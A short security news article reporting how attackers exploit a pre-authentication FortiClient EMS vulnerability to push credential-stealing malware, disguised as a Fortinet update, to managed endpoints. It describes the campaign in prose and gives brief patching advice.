Close Menu
Most Read

Threat actors exploit FortiClient EMS flaw for credential theft

Staff WriterBy No Comments2 Mins Read1 Views

Summary Points

  1. Threat actors exploited CVE-2026-35616 to gain pre-authentication API access, using compromised FortiClient EMS to deliver credential-stealing malware via legitimate updates and PowerShell scripts.
  2. They modified EMS configurations to push malicious scripts across managed endpoints, enabling widespread execution without additional intrusion points.
  3. The malware, disguised as a FortiClient update, harvests sensitive data from browsers and exfiltrates it, while session cookies and credentials could enable further attacks on cloud and internal resources.

Threat Overview, Techniques, and Targets

Threat actors are exploiting a critical vulnerability in FortiClient Endpoint Management Server (EMS) to deliver credential-stealing malware. This flaw, identified as CVE-2026-35616, allows attackers to bypass API access and escalate privileges without authentication. The exploit occurs before authentication, leading to configuration modifications in EMS. These changes help threat actors hide malicious activities and push malicious scripts to managed endpoints.

The attackers disguise malware as legitimate Fortinet updates, such as “FortiEndpoint_Patch.exe.” They use trusted management pathways to silently execute PowerShell commands, which download and run malicious payloads. This malware can harvest sensitive data like passwords, cookies, and personal details from browsers. The malware also exfiltrates data to an external server via HTTP POST requests. The activity was observed in May 2026.

The actors target organizations that use FortiClient EMS to manage endpoints. Because the attack manipulates EMS configurations, all managed devices become potential targets. This allows widespread infection across an organization’s network.

Impact, Security Implications, and Remediation Guidance

The attack can have serious impacts. Threat actors can access sensitive information stored on endpoints. Since the malware can harvest login data, they may gain access to internal applications, cloud services, and other protected resources. The use of legitimate management tools makes detection difficult. Additionally, the malware’s exfiltration methods can enable long-term follow-on access.

Security implications include increased risk of data theft and network compromise. Because the malware can bypass security controls like MFA, organizations face higher chances of persistent threats.

Remediation guidance is not provided in the current information. Organizations should seek advice from Fortinet or relevant security authorities. It is important to update FortiClient EMS to version 7.4.7 or later, as the flaw has been addressed in this release. Regularly reviewing and monitoring EMS configurations for unauthorized changes can also help mitigate risk.

Stay Ahead with the Latest Tech Trends

Explore the future of technology with our detailed insights on Artificial Intelligence.

Discover archived knowledge and digital history on the Internet Archive.

ThreatIntel-V1

Share.
Avatar photo

John Marcelli is a staff writer for the CISO Brief, with a passion for exploring and writing about the ever-evolving world of technology. From emerging trends to in-depth reviews of the latest gadgets, John stays at the forefront of innovation, delivering engaging content that informs and inspires readers. When he's not writing, he enjoys experimenting with new tech tools and diving into the digital landscape.

Related Posts

Comments are closed.